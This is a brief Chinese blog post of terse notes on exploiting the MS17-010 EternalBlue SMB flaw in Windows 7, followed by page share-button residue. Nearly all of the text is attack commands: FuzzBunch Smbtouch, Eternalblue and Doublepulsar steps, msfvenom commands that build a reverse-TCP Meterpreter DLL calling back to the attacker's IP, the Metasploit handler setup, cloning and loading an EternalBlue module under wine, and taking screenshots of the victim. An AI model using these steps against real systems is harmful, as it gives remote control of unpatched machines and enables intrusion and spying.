ms17010
2019-04-14 20:28发布
生成海报
Windows上原生payload
fb.py
设置目标IP
设置本机IP
no
项目新名称:随便写
fb > use Smbtouch 检测哪些漏洞可用
生成后门
msfvenom.bat -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=8089 -f dll >reverse.dll
msf监听:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
set lhost
set lport
run
选择永恒之蓝漏洞
fb Touch (Smbtouch) > use Eternalblue
target选1,win7
fb Special (Eternalblue) > use Doublepulsar
选2,run dll
msf-windows.msi
工具:
链接
Linux-msf移植payload
安装wine32:
dpkg –add-architecture i386 && apt-get install wine32
克隆项目到 /root
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
复制到metasploit目录 (usr/share)
msf>reload_all
msf>use eternalblue_doublepulsar
msf>set RHOST
msf>run
(报错,执行wine -h)
生成后门
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.12.110 lport=4444 -f dll -o /root/.wine/drive_c/eternal11.dll
meterpreter>screenshot #截屏
打开微信“扫一扫”,打开网页后点击屏幕右上角分享按钮
{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://www.xiaopingtou.cn//data/attach/topic/topicKPo7gB.jpg', '推荐 cys1 的文章《ms17010》','https://www.xiaopingtou.net/article-58764.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}